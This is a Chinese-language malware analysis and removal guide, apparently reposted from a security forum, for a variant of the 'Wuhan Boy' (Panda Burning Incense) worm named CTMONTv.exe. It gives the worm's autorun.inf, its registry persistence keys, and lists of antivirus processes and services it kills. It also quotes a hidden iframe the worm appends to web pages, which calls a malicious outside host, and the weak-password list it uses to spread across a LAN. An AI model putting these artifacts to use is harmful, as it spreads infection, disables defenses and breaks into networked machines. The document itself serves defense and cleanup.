武汉男生感染下载者变种 CTMONTv.exe 解决方案

yxwxqflbyg

武汉男生感染下载者变种 CTMONTv.exe 解决方案
转自:http://www.cisrt.org/bbs/
病毒名称：N/A（Kaspersky）
病毒别名：Win32.Troj.Small.sg.148992（毒霸）
病毒大小：148,992 字节
加壳方式：
样本MD5：e19ef5f937e6c04014752f5a750a71ec
样本SHA1：220cd8c31548245ee05559030511eea6e177c7ca
关联病毒：
传播方式：恶意网页、其它病毒下载，通过局域网、移动存储设备传播


技术分析
==========

“熊猫烧香”（武汉男生感染下载者）的变种，与以往不同的是病毒程序图标不是“熊猫烧香”，这次的图标是普通安装程序图标（见附件），而且在实际运行测试中病毒并没有向系统目录复制副本。

病毒运行后复制自身到系统目录：
%System%\drivers\CTMONTv.exe
释放dll文件注入Explorer.exe进程：
%Windows%\ravdll.dll

向各分区根目录复制病毒副本：
X:\setup.exe
X:\autorun.inf

autorun.inf内容：


[Copy to clipboard]
CODE:
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe

创建自启动项：


[Copy to clipboard]
CODE:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svcshare"="%System%\drivers\CTMONTv.exe"

修改注册表使“显示所有文件和文件夹”选项失效：


[Copy to clipboard]
CODE:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000000

病毒尝试关闭安全相关窗口：
天网
防火墙
进程
VirusScan
NOD32
网镖
杀毒
毒霸
瑞星
江民
黄山IE
超级兔子
优化大师
木马清道夫
木馬清道夫
QQ病毒
注册表编辑器
系统配置实用程序
卡巴斯基反病毒
Symantec AntiVirus
Duba
Windows 任务管理器
esteem procs
绿鹰PC
密码防盗
噬菌体
木马辅助查找器
System Safety Monitor
Wrapped gift Killer
Winsock Expert
游戏木马检测大师
超级巡警
msctls_statusbar32
pjf(ustc)
IceSword

尝试结束安全相关进程及Viking病毒进程：
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
runiep.exe

Logo1_.exe
Logo_1.exe
Rundl132.exe

尝试删除安全相关启动项：
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse

尝试删除安全相关服务：
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RsCCenter
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RsRavMon
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RsCCenter
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RsRavMon
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KVWSC
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KVSrvXP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kavsvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AVP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McAfeeFramework
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McShield
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McTaskManager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\navapsvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KPfwSvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNDSrvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ccProxy
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ccEvtMgr
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ccSetMgr
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPBBCSvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Symantec Core LC
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NPFMntor
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MskService
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FireSvc

删除除以下目录外其它目录中的gho文件，并修改htm/html/asp/php/jsp/aspx网页文件：
C:\
C:\WINDOWS\
C:\WINNT\
C:\WINDOWS\system32\
C:\WINNT\system32\
C:\Documents and Settings\
C:\System Volume Information\
C:\Recycled\
C:\Program Files\Windows NT\
C:\Program Files\WindowsUpdate\
C:\Program Files\Windows Media Player\
C:\Program Files\Outlook Express\
C:\Program Files\Internet Explorer\
C:\Program Files\NetMeeting\
C:\Program Files\Common Files\
C:\Program Files\ComPlus Applications\
C:\Program Files\Messenger\
C:\Program Files\InstallShield Installation Information\
C:\Program Files\MSN\
C:\Program Files\Microsoft Frontpage\
C:\Program Files\Movie Maker\
C:\Program Files\MSN Gamin Zone\
在文件尾部追加隐藏iframe代码：


[Copy to clipboard]
CODE:
<iframe src="http://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>

尝试使用命令删除管理共享：


[Copy to clipboard]
CODE:
cmd.exe /c net share X$ /del /y
cmd.exe /c net share admin$ /del /y

尝试使用弱密码访问局域网内其它计算机：
Administrator
Guest
admin
Root

1234
password
6969
harley
123456
golf
pussy
mustang
1111
shadow
1313
fish
5150
7777
qwerty
baseball
2112
letmein
12345678
12345
ccc
admin
5201314
qq520
1
12
123
1234567
123456789
654321
54321
111
000000
abc
pw
11111111
88888888
pass
passwd
database
abcd
abc123
sybase
123qwe
server
computer
520
super
123asd
0
ihavenopass
godblessyou
enable
xp
2002
2003
2600
alpha
110
111111
121212
123123
1234qwer
123abc
007
a
aaa
patrick
pat
administrator
root
sex
god
fuckyou
fuck
test
test123
temp
temp123
win
pc
asdf
pwd
qwer
yxcv
zxcv
home
xxx
owner
login
Login
pw123
love
mypc
mypc123
admin123
mypass
mypass123
901100
将病毒自身以GameSetup.exe文件名复制过去。

病毒内包含文字信息如下：


[Copy to clipboard]
CODE:
***武*汉*男*生*感*染*下*载*者***
感谢艾玛,mopery对此木马的关注!~
xboy
whboy

清除步骤
==========

1. 断开网络

2. 结束病毒进程：
%System%\drivers\CTMONTv.exe

3. 删除病毒文件：
%System%\drivers\CTMONTv.exe

4. 通过分区盘符右键菜单的“打开”进入根目录，删除病毒文件：
X:\setup.exe
X:\autorun.inf

5. 重新启动计算机

6. 删除病毒文件：
%Windows%\ravdll.dll

7. 删除病毒启动项：


[Copy to clipboard]
CODE:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svcshare"="%System%\drivers\CTMONTv.exe"

8. 修改注册表，恢复“显示所有文件和文件夹”选项功能：


[Copy to clipboard]
CODE:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000001

9. 修复或重新安装被破坏的安全相关软件，并使用反病毒软件进行全盘扫描

10. 恢复被修改的网页文件，可以使用反病毒软件清除，也可以使用Dreamweaver等网页编辑工具的替换功能删除被追加的恶意代码